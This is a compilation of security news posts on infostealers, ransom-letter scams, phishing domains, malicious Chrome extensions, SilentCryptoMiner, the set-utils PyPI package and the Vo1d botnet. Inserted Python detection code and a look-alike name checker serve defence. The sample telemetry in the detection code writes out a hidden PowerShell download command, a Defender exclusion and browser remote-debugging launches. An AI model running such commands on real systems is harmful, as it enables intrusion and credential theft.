
Phantom Goblin: An Emerging Menace in Credential Theft and Remote System Access

 

A complex malware campaign dubbed "Phantom Goblin" has been discovered; it uses social engineering to install information-stealing malware. The malware is distributed through RAR attachments in spam messages that contain a poisoned shortcut (LNK) file posing as a PDF.

When executed, the LNK file launches a PowerShell routine that downloads further payloads from a GitHub repository and establishes persistence by creating a registry entry that runs at system boot. These payloads, "updater.exe," "vscode.exe," and "browser.exe," masquerade as legitimate applications, which complicates detection.

The malware primarily targets web browsers and development tools to steal sensitive data. It harvests cookies, saved passwords, and browsing history after forcing browsers such as Chrome, Brave, and Edge to close. The "updater.exe" payload enables browser remote debugging to bypass Chrome's App Bound Encryption (ABE) and exfiltrate data covertly. The stolen information is then sent to a Telegram channel via the Telegram Bot API, which lets the criminals receive data in real time without arousing suspicion.

Phantom Goblin also uses Visual Studio Code (VSCode) tunnels for unauthorised remote access. The "vscode.exe" payload downloads a legitimate copy of VSCode, unpacks it, and creates a tunnel to maintain persistent control over compromised PCs. The tunnel's connection credentials are passed to a Telegram bot, giving the attackers remote access without triggering conventional security alerts.

Prevention tips

Several best practices are recommended by experts to safeguard systems against Phantom Goblin and similar threats:

Email Filtering: Use advanced filtering to block suspicious attachments, especially RAR, ZIP, or LNK files. Make sure attachments are scanned with up-to-date antivirus software before they are opened.

Disabling VSCode tunnels: Enforce access controls and authentication so that unauthorised users cannot open Visual Studio Code tunnels. Limiting the use of VSCode on sensitive systems can help prevent remote access.

PowerShell Restrictions: Disable or limit PowerShell and script execution on computers unless absolutely necessary. Monitoring for suspicious PowerShell activity, such as scripts fetched from external sources, can help detect and stop malicious operations.

Browser Security: Use strong browser security controls to prevent unauthorised debugging and limit access to sensitive data stored in the browser. Enforcing multi-factor authentication (MFA) and session timeouts can help secure browser-based credentials.

FBI Warns of Fake Ransom Demands Sent by Mail to US Executives

 



A new scam is targeting top business leaders in the United States, where criminals are sending letters demanding large ransom payments. Unlike typical ransomware attacks that involve hacking into computer systems, this scheme relies on physical mail. The letters claim that hackers have stolen company data and will leak it unless a ransom of $250,000 to $500,000 is paid. However, cybersecurity experts believe this is a fraud, with no actual hacking involved.  


How the Scam Works  

Investigators from the GuidePoint Research and Intelligence Team (GRIT) discovered that several companies have received these ransom letters through the US Postal Service (USPS). The letters are addressed to high-level executives and claim to be from the BianLian ransomware group, a known cybercriminal organization.  

The message states that the company's confidential information has been stolen and will be exposed unless the demanded payment is made within ten days. To make the threat appear real, the letter includes a Bitcoin wallet address and a QR code that links directly to it. Some letters also provide links to BianLian’s dark web site to add legitimacy to the claim.  

Despite these details, security analysts have found no proof that any actual data theft has occurred. The scam relies on fear and deception, hoping that executives will panic and send money.  


Why Experts Believe the Threat Is Fake  

Cybersecurity specialists have carefully examined multiple cases of this scam and found no signs of hacking or data breaches. The companies targeted in this scheme have not reported any unusual activity or unauthorized access to their systems. This strongly suggests that the criminals behind the letters are only pretending to be the BianLian ransomware group.  

The FBI has confirmed that these letters are part of a fraud campaign and do not represent a real cyberattack. Many of the envelopes are marked as "Time Sensitive" to create urgency, and some even list a return address in Boston, Massachusetts, which appears to be another false detail.  

Since there is no actual ransomware attack, businesses do not need to take technical action like removing malware or restoring stolen files. The main risk comes from executives believing the scam and paying the ransom.  


What to Do If You Receive One of These Letters  

If your company receives a similar ransom demand, take the following precautions:  

1. Check Your Systems for Security Issues – Ensure that company networks are protected and that there are no signs of hacking or data leaks. Keeping cybersecurity measures updated is always important.  

2. Do Not Send Any Money – These threats are fake, and paying the ransom will only encourage further scams.  

3. Report the Scam – Contact law enforcement and inform the nearest FBI field office about the letter. Complaints can also be filed with the Internet Crime Complaint Center (IC3).  

4. Inform Key Personnel – Let executives and employees know about this scam so they can recognize and ignore similar fraud attempts in the future.  

 

This scam is a reminder that cybercriminals do not always rely on advanced hacking techniques. Sometimes, they use old-fashioned methods like physical mail to create fear and manipulate victims into paying. While real ransomware attacks remain a serious concern, this particular scheme is based on false claims.  

Companies should stay informed and take precautions to avoid falling victim to these types of fraud. Being aware of such scams is the best way to protect against them.

Fake Websites and Malware Threats: How to Stay Safe Online

 



Recent research from the cybersecurity company NordVPN has revealed a significant rise in online threats, with over 669 million malware attacks recorded in the UK in 2024 alone. This alarming number highlights the increasing risk of falling victim to fake websites, harmful ads, and malicious software, especially when browsing popular websites or using free video streaming platforms.  


Fake Websites Imitating Well-Known Brands  

Cybercriminals often create websites that look almost identical to popular tech companies like Google, Facebook, and Microsoft. Their main goal is to trick people into providing their login details, which can then be misused for criminal activities.  

NordVPN’s research shows that in 2024, over 85,000 fake web links were created to imitate Google's official platforms. Similarly, around 6,000 fake links were designed to look like Facebook, and nearly 5,000 were made to mimic Microsoft. Other major companies such as AT&T, Yahoo!, and Netflix were also targeted, with around 4,000 fake URLs created for each.  

A common tactic used by scammers is slightly altering the spelling of well-known brand names, hoping that people won't notice the difference. For example, they may change "Google" to "G00gle" or "Amazon" to "Arnazon." This simple trick often convinces users to enter their login details, unknowingly handing their information over to cybercriminals.  

Although these major tech companies have no involvement in the fraud, their popularity makes them easy targets for impersonation. Because people generally trust these brands, they often do not realize they have been scammed until it’s too late.  


Malware Hidden on Video Hosting Platforms  

Another major source of cyber threats is free video streaming websites, where users often go to watch movies, shows, or anime. According to NordVPN’s findings, over 1.5 billion attempts to infect devices with malware were blocked on such sites in 2024 alone.  

Websites related to entertainment, sports, and file-sharing are especially vulnerable. Malware infections on entertainment websites alone reached almost one billion, while sports sites recorded around 124 million attacks. Additionally, adult content sites and file-sharing platforms faced millions of malware infiltration attempts.  

The risk doesn't stop at malware. Many of these websites are filled with intrusive advertisements and hidden web trackers designed to collect user data. These trackers monitor your online activity, gathering information about your browsing habits, interests, and personal details. While companies use this data to target you with advertisements, it can become dangerous if hackers gain access to it.  


Understanding the Threats: Malware, Trackers, and Intrusive Ads  

Malware, short for malicious software, refers to harmful programs like viruses, spyware, ransomware, and trojans. If malware infects your device, it can steal your sensitive information, lock your files, or even give hackers full control of your device. This often happens when users unknowingly download files from untrusted websites or click on suspicious links.  

Trackers are small tools placed on websites to monitor your online behavior. Companies use this information for marketing purposes, but if the data is leaked, it can be misused by hackers for malicious purposes.  

Intrusive advertisements, commonly seen on free video streaming sites, pose another risk. These ads not only disrupt your browsing experience but can also direct you to harmful websites or secretly install malware on your device without your consent.  


Tips to Protect Yourself from Cyber Threats  

Cybersecurity expert Adrianus Warmenhoven suggests some practical ways to protect yourself from online threats like malware, intrusive ads, and web trackers. Here’s how you can stay safe:  

1. Avoid Free or Suspicious Websites

Websites offering free video hosting, downloads, or pirated content often hide harmful software. Avoid visiting such sites, as they are more likely to infect your device with malware.  

2. Be Careful with Unknown Emails and Messages

Cybercriminals often use emails or messages that promise big rewards or urgent updates to trick you into giving away personal information. Avoid clicking on links in emails that sound too good to be true or ask for your data.  

3. Always Verify Links Before Clicking  

Scammers often create fake links that look similar to popular websites. For example, a fake website might spell "Amazon" as "Arnazon" to confuse you. Always double-check the spelling of website links before clicking on them.  

4. Check Files Before Downloading

Malware can often be hidden in files disguised as legitimate downloads. To avoid downloading harmful files, always use reliable websites and scan files with antivirus software before opening them.  

5. Protect Your Personal Information

Limit the amount of personal information you share online, especially on social media. Cybercriminals can misuse details like your full name, location, or contact information for scams or identity theft.  

6. Keep Your Devices Updated 

Outdated software can make your device vulnerable to malware and other cyber threats. Regularly update your operating system, apps, and security software to patch any security flaws.  

By following these steps, you can reduce the risk of falling victim to online threats and ensure your personal information remains safe.

Cybercriminals Abuse Microsoft Teams & Quick Assist for Remote Access

 

Trend Micro security experts discovered a sophisticated cyberattack that combines social engineering with commonly used remote access tools. The attack, which deploys stealthy infostealer malware, gives the attackers persistent access to compromised PCs and lets them steal sensitive data.

According to Trend Micro Threat Intelligence, the majority of incidents since October 2024 have been concentrated in North America, with 21 breaches reported. The US was the most affected, with 17 cases, followed by Canada and the United Kingdom, each with five. Europe documented a total of 18 incidents. 

Modus operandi 

Threat actors use social engineering to gain initial access by deceiving victims into handing over credentials. Microsoft Teams is used for impersonation, and Quick Assist and other remote access tools allow the attackers to escalate privileges. OneDriveStandaloneUpdater.exe, a genuine OneDrive update executable, is abused to sideload malicious DLLs and give the attackers network access.

Subsequently, the attackers install BackConnect malware, which lets them keep control of affected systems. Malicious files are hosted and distributed via commercial cloud storage services, abusing misconfigured or publicly accessible storage buckets.

The BackConnect malware has been linked by researchers to QakBot, a loader malware that was the focus of the 2023 takedown effort called "Operation Duckhunt." Access to target computers by Black Basta ransomware attackers was made possible in large part via QakBot. After it was taken down, these threat actors switched to alternative methods to continue operating. 

Black Basta and Cactus ransomware link 

Trend Micro analysts recently investigated cases in which the Black Basta and Cactus ransomware operators used the identical BackConnect malware. This malware allows cybercriminals to execute commands remotely and steal credentials and financial information.

In 2023, Black Basta alone extorted $107 million from victims, with manufacturing the hardest-hit sector, followed by finance and real estate. The attackers also used WinSCP, an open-source file transfer client, to move data within infected systems. The infected files were first retrieved from a cloud storage provider before being repackaged and distributed by exploiting system vulnerabilities.

Further investigation into Black Basta's internal chat breaches indicates that members of the gang are now using Cactus ransomware. Researchers believe that this transition will allow Cactus to remain a major threat by 2025.

New Polymorphic Attack Enables Malicious Chrome Extensions to Impersonate Password Managers and Banking Apps

Researchers at SquareX Labs have uncovered a sophisticated “polymorphic” attack targeting Google Chrome extensions, allowing malicious extensions to seamlessly morph into trusted ones, such as password managers, cryptocurrency wallets, and banking apps. The attack exploits Chrome’s ‘chrome.management’ API to gain insights into the user’s installed extensions and then impersonates them to steal sensitive information. 

The attack begins when an unsuspecting user installs a seemingly legitimate extension—such as an AI-powered marketing tool—through the Chrome Web Store. Once installed, the extension gains access to the list of other installed extensions using the ‘chrome.management’ API. If this permission is not granted, attackers can use a stealthier approach, injecting malicious code into web pages to detect installed extensions based on unique resource requests. 

This information is then sent to an attacker-controlled server, which determines whether a targeted extension is present. If a high-value target, such as a password manager, is detected, the malicious extension initiates the impersonation process. SquareX demonstrated how attackers could disable a legitimate extension, like 1Password, using the ‘chrome.management’ API or by manipulating the user interface to hide it. Simultaneously, the malicious extension changes its name, icon, and behavior to mimic the real one. 
To lure victims into entering their credentials, attackers deploy deceptive tactics, such as displaying fake session expiration messages that prompt users to log back in via a phishing form.

The stolen credentials are then sent to the attackers, after which the malicious extension reverts to its original state and re-enables the genuine extension, making detection nearly impossible. 

SquareX Labs has responsibly disclosed the vulnerability to Google, warning that it remains exploitable even in the latest Chrome version. The researchers recommend that Google strengthen security measures by restricting abrupt extension modifications, such as icon or HTML changes, or at the very least, issuing user alerts when such modifications occur. They also criticize Google’s classification of the ‘chrome.management’ API as a “medium risk,” given its extensive use in widely trusted extensions, including ad blockers and password managers. 

As of now, Google has not implemented any direct countermeasures against this attack. BleepingComputer has reached out to the company for a statement and will update its report accordingly. Meanwhile, users are advised to exercise caution when installing Chrome extensions and to be wary of unusual login prompts that could be phishing attempts.

SilentCryptominer Threatens YouTubers to Post Malware in Videos

Experts have discovered an advanced malware campaign that exploits the rising popularity of Windows Packet Divert drivers, which are used to bypass internet restrictions.

Malware targets YouTubers 

Hackers are spreading SilentCryptominer malware disguised as genuine software. It has affected over 2,000 victims in Russia alone. The attack vector involves tricking YouTubers with a large follower base into spreading malicious links.

“Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives,” reports Securelist. This helps threat actors by “allowing them to persist in an unprotected system without the risk of detection.”

Innocent YouTubers Turned into victims

“Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency.” Malware families commonly found in this distribution scheme include Phemedrone, DCRat, NJRat, and XWorm.

In one incident, a YouTuber with 60k subscribers posted videos containing malicious links to infected archives, gaining over 400k views. The malicious files were hosted on gitrok[.]com, with the download counter exceeding 40,000.

Blackmail and distributing malware

Threat actors have started using a new distribution tactic: they send copyright strikes to content creators and influencers and threaten to have their channels shut down unless they post videos containing malicious links. The scare tactic abuses the fame of popular YouTubers to distribute malware to a larger audience.

The infection chain starts with a manipulated start script that launches an additional executable via PowerShell.

According to the Securelist report, the loader, written in Python and packaged with PyInstaller, fetches the next-stage payload from hardcoded domains. The second-stage loader runs environment checks, adds the “AppData directory to Microsoft Defender exclusions,” and downloads the final payload, SilentCryptoMiner.

The infamous SilentCryptoMiner

SilentCryptoMiner is known for mining several cryptocurrencies using different algorithms. It uses process hollowing to inject the miner code into legitimate processes for stealth.

The malware also includes evasion measures: it pauses mining when certain processes are running and checks for indicators of a virtual environment.
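The behaviours described in the Phantom Goblin post above (a hidden PowerShell download, Run-key persistence, a browser relaunched with remote debugging, a VSCode tunnel), in the Teams/Quick Assist post (OneDriveStandaloneUpdater.exe sideloading a DLL) and in this SilentCryptoMiner chain (a Defender exclusion added for AppData) can all be written as simple detection rules over endpoint telemetry. The Python below is an added example, not code from any of the posts or the vendors they cite; the event records are constructed, loosely shaped like Sysmon process-creation, registry-set and image-load events, and every path, URL, user name and DLL name in them is a placeholder rather than a real indicator.

```python
"""Toy detection rules over constructed endpoint telemetry (added example).

Event shapes loosely follow Sysmon process-creation ("proc"), registry-set
("reg") and image-load ("img") records. All paths, URLs and names are
constructed placeholders, not real indicators.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample telemetry: a mix of benign and suspicious records.
SAMPLE_EVENTS: List[Event] = [
    # 0: hidden PowerShell download launched from Explorer, as an LNK would do
    #    (PLACEHOLDER-REPO stands in for the unnamed GitHub repository)
    {"type": "proc", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -ep bypass -c "iwr https://github.com/PLACEHOLDER-REPO/raw/main/updater.exe -OutFile $env:APPDATA\updater.exe"'},
    # 1: benign interactive PowerShell from an admin's cmd window
    {"type": "proc", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-Process"},
    # 2: Run-key persistence pointing at an executable in AppData
    {"type": "reg", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r"C:\Users\alice\AppData\Roaming\updater.exe"},
    # 3: Chrome relaunched by the stealer with a remote-debugging port
    {"type": "proc", "parent": r"C:\Users\alice\AppData\Roaming\updater.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --remote-debugging-port=9222 --headless"},
    # 4: loader adding AppData to Defender exclusions (SilentCryptoMiner chain)
    {"type": "proc", "parent": r"C:\Users\alice\AppData\Local\Temp\loader.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "Add-MpPreference -ExclusionPath $env:APPDATA"'},
    # 5: OneDriveStandaloneUpdater.exe copied to Temp and loading a DLL from there
    {"type": "img", "image": r"C:\Users\alice\AppData\Local\Temp\OneDriveStandaloneUpdater.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\version.dll"},
    # 6: VS Code CLI opening a tunnel from a user-writable directory
    {"type": "proc", "parent": r"C:\Users\alice\AppData\Roaming\vscode.exe",
     "image": r"C:\Users\alice\AppData\Roaming\code\code.exe",
     "cmdline": "code.exe tunnel"},
]

USER_WRITABLE = re.compile(r"\\(appdata|temp|users\\public|programdata)\\", re.I)
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hidden_powershell_download(e: Event) -> bool:
    """PowerShell with a hidden window that also fetches something from the network."""
    if e["type"] != "proc" or basename(e["image"]) not in POWERSHELL:
        return False
    c = e["cmdline"].lower()
    hidden = re.search(r"-w(indowstyle)?\s+hidden", c)
    fetch = re.search(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", c)
    return bool(hidden and fetch)


def run_key_to_user_dir(e: Event) -> bool:
    """Autorun entry whose target lives in a user-writable directory."""
    return (e["type"] == "reg" and r"\currentversion\run" in e["key"].lower()
            and bool(USER_WRITABLE.search(e["data"])))


def browser_remote_debugging(e: Event) -> bool:
    """Browser started with the DevTools remote-debugging port enabled."""
    return (e["type"] == "proc" and basename(e["image"]) in BROWSERS
            and "--remote-debugging-port" in e["cmdline"].lower())


def defender_exclusion_added(e: Event) -> bool:
    """Add-MpPreference used to exclude a path from Microsoft Defender."""
    c = e.get("cmdline", "").lower()
    return e["type"] == "proc" and "add-mppreference" in c and "-exclusionpath" in c


def onedrive_updater_sideload(e: Event) -> bool:
    """Genuine OneDrive updater binary loading a DLL from a user-writable directory."""
    return (e["type"] == "img" and basename(e["image"]) == "onedrivestandaloneupdater.exe"
            and bool(USER_WRITABLE.search(e["loaded"])))


def vscode_tunnel(e: Event) -> bool:
    """VS Code CLI invoked with the 'tunnel' subcommand."""
    return (e["type"] == "proc" and basename(e["image"]).startswith("code")
            and re.search(r"\btunnel\b", e["cmdline"].lower()) is not None)


RULES: Dict[str, Callable[[Event], bool]] = {
    "hidden_powershell_download": hidden_powershell_download,
    "run_key_to_user_dir": run_key_to_user_dir,
    "browser_remote_debugging": browser_remote_debugging,
    "defender_exclusion_added": defender_exclusion_added,
    "onedrive_updater_sideload": onedrive_updater_sideload,
    "vscode_tunnel": vscode_tunnel,
}


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, e in enumerate(events)
            for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for idx, rule_name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name}")
```

Each rule is deliberately narrow and keyed to one observable from the reports, so the benign admin PowerShell (event 1) produces no hit. In a real environment the user-writable path list and the download keywords need tuning, but a single hit on the Defender-exclusion, remote-debugging or DLL-sideload rule is usually worth a human look on its own.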

Latest PyPi Malware Steals Ethereum Private Keys, Developers Targeted

Researchers at Socket have exposed a malicious PyPI (Python Package Index) package, set-utils, that steals Ethereum private keys by hooking “commonly used account creation functions.”

Disguised as a simple utility for Python sets, the package imitates widely used libraries such as python-utils (712M+ downloads) and utils (23.5M+ downloads). The lure baits unsuspecting developers into installing the malicious package, giving attackers unauthorized access to Ethereum wallets.

Since the start of this year, set-utils has been downloaded over 1,000 times, exposing Ethereum users and developers to risk. The package targets people working with blockchain technology, especially developers who use Python-based wallet management libraries such as eth-account.

The package hijacks Ethereum account creation to steal private keys and exfiltrates them through the blockchain, using https://rpc-amoy.polygon.technology/ as a command-and-control (C2) server. This lets the attackers retrieve stolen credentials covertly.

Who set-utils targets

set-utils targets Ethereum developers and businesses working with Python-based blockchain apps. These include:

  • Web3 apps and crypto exchanges that integrate Ethereum transactions.
  • Users who manage personal Ethereum wallets through Python automation.
  • Blockchain developers using eth-account for wallet creation and handling.
  • Anyone who installed the package may have exposed their private keys to the attackers, risking major financial losses.

Consequences of the set-utils attack

  • Theft of Ethereum private keys: set-utils hooks into standard wallet creation methods, which makes it hard to notice.
  • Abuse of the Polygon RPC endpoint (rpc-amoy.polygon.technology/) as a C2 channel: rather than using conventional network exfiltration, the attackers hide stolen data inside blockchain transactions, making it difficult to detect.
  • Hardcoded attacker-controlled RSA public key: private keys are encrypted before being sent, hiding the data from basic monitoring.
  • Permanent compromise: even if a user uninstalls set-utils, Ethereum wallets created “while it was active are already exposed and compromised.”

Controlling the damage

To mitigate the risk, businesses and developers should implement robust measures to protect their software supply chains. Routine dependency audits and automated scanning tools can help detect malicious or suspicious behaviour in third-party packages when they are incorporated into production environments.

According to Socket, “Integrating these security measures into development workflows, organizations can significantly reduce the likelihood of supply chain attacks.”  Socket has notified the PyPI team, and “it was promptly removed to prevent further attacks.”
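Both the fake-website post above (G00gle, Arnazon) and this set-utils case involve a name chosen to resemble a trusted one, which is something a routine audit can check mechanically. The Python below is an added example, not code from NordVPN, Socket or the posts; it normalises common homoglyph substitutions, computes an edit distance that counts adjacent transpositions, and flags names that reuse a whole token of a popular package name (as set-utils reuses utils). The brand and package lists are constructed stand-ins for the much larger lists a real check would use.

```python
"""Look-alike name checker for domains and package names (added example).

The trusted lists and the homoglyph table are constructed for illustration.
"""
import re
from typing import List, Optional, Tuple

# Constructed reference lists; a real deployment would use a much larger set.
TRUSTED_BRANDS = ["google", "facebook", "microsoft", "amazon", "netflix", "yahoo"]
POPULAR_PACKAGES = ["requests", "python-utils", "utils", "eth-account"]

# Visual substitutions commonly used in look-alike names. Heuristic: words
# that genuinely contain "rn" or "vv" will be normalised too.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(name: str) -> str:
    """Lower-case the name and undo the homoglyph substitutions above."""
    out = name.lower()
    for fake, real in HOMOGLYPHS:
        out = out.replace(fake, real)
    return out


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def look_alike(candidate: str, trusted: List[str],
               max_distance: int = 1) -> Optional[Tuple[str, str]]:
    """Return (trusted_name, reason) if candidate imitates a trusted name, else None.

    Exact matches are not flagged. Checks, in order: equality after homoglyph
    normalisation, small edit distance, and reuse of a whole token of a trusted
    name (e.g. 'utils' inside 'set-utils').
    """
    cand = candidate.lower()
    if cand in trusted:
        return None
    norm = normalize(cand)
    for t in trusted:
        if norm == t:
            return (t, "homoglyph")
        dist = osa_distance(norm, t)
        if dist <= max_distance:
            return (t, f"edit-distance {dist}")
    tokens = set(re.split(r"[-_.]", cand))
    for t in trusted:
        if t in tokens:
            return (t, "shares token")
    return None


def check_domain(hostname: str) -> Optional[Tuple[str, str]]:
    """Compare the registrable label of a hostname against the brand list.

    Simplification: takes the label before the last dot, which is wrong for
    two-part public suffixes such as co.uk.
    """
    parts = hostname.lower().strip(".").split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    return look_alike(label, TRUSTED_BRANDS)


def check_package(name: str) -> Optional[Tuple[str, str]]:
    """Compare a package name against the popular-package list."""
    return look_alike(name, POPULAR_PACKAGES)


if __name__ == "__main__":
    for host in ["g00gle.com", "login.arnazon.co", "goggle.com", "google.com"]:
        print(host, "->", check_domain(host))
    for pkg in ["set-utils", "reqeusts", "eth-account"]:
        print(pkg, "->", check_package(pkg))
```

The token rule is the noisiest of the three (many legitimate packages contain "utils"), so treat its hits as a prompt to inspect the package's maintainer, age and download history rather than as a verdict; the homoglyph and edit-distance hits are much more specific.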

Malware Attack on Android TV Devices Affects Over 1.6 Million Users

 



Cybersecurity researchers have discovered a new form of malware that is spreading through Android TV devices across the globe. This malware, known as Vo1d, has already infected over 1.6 million devices, turning them into remote-controlled bots used for illegal activities without the owners’ knowledge.  

The Vo1d malware has existed for a while, but researchers at XLab recently identified a stronger, more advanced version that makes it harder to detect and remove. This upgraded variant has been designed to avoid being analyzed or controlled by cybersecurity experts, making it a serious concern for Android TV users.  


How the Vo1d Malware Works  

Once Vo1d malware enters an Android TV device, it secretly connects it to a network controlled by hackers, known as a botnet. This allows the attackers to control thousands of devices at once without the owners realizing it. These devices are then used to carry out illegal activities like DDoS attacks and ad click fraud.  

In a DDoS (Distributed Denial of Service) attack, a large number of devices flood a website or service with so many requests that it crashes, making it inaccessible. On the other hand, ad click fraud involves the infected devices automatically clicking on online ads, creating fake revenue for dishonest advertisers. Both of these activities can cause financial losses to companies and harm online platforms.  

The malware has been particularly active in countries like Argentina, Brazil, China, Indonesia, South Africa, and Thailand. However, since it is spreading rapidly, users in other countries should also remain cautious.  


Why This Malware Is Difficult to Detect  

One of the main challenges with the new Vo1d variant is that it uses advanced encryption methods, which prevent cybersecurity professionals from studying or controlling it. It also hides deep within the device’s system, making it nearly impossible for regular antivirus software to detect and remove it.  

This ability to stay hidden allows the malware to operate silently for long periods, allowing hackers to keep using the device for illegal purposes. As a result, users may remain unaware that their device has been compromised.  


How to Protect Your Android TV Device  

To reduce the chances of your Android TV being infected by Vo1d, consider following these precautionary steps:  

1. Buy From Trusted Sources: Always purchase Android TV devices from well-known brands or official retailers. Avoid buying from unknown sellers, as some devices may already be compromised before purchase.  

2. Update Regularly: Install all firmware and security updates provided by the device manufacturer. These updates often fix vulnerabilities that malware exploits.  

3. Download Apps Carefully: Only download apps from official platforms like the Google Play Store. Avoid installing apps from third-party websites, as they may carry hidden malware.  

4. Watch for Unusual Activity: If your Android TV starts slowing down, overheating, or using too much data without reason, it may be infected. In such cases, reset your device and consider installing a trusted antivirus app.  

5. Secure Your Network: Make sure your home Wi-Fi has a strong password and activate firewall settings to reduce the chances of remote attacks.    


The rapid spread of Vo1d malware has raised concern among cybersecurity experts. With over 1.6 million devices already infected, users need to stay alert and take protective measures. By purchasing devices from verified sources, keeping software updated, and avoiding untrusted apps, users can reduce their risk of falling victim to such malware attacks.  

Staying informed about new threats and remaining cautious with device usage is the best way to keep your Android TV safe from harmful malware like Vo1d.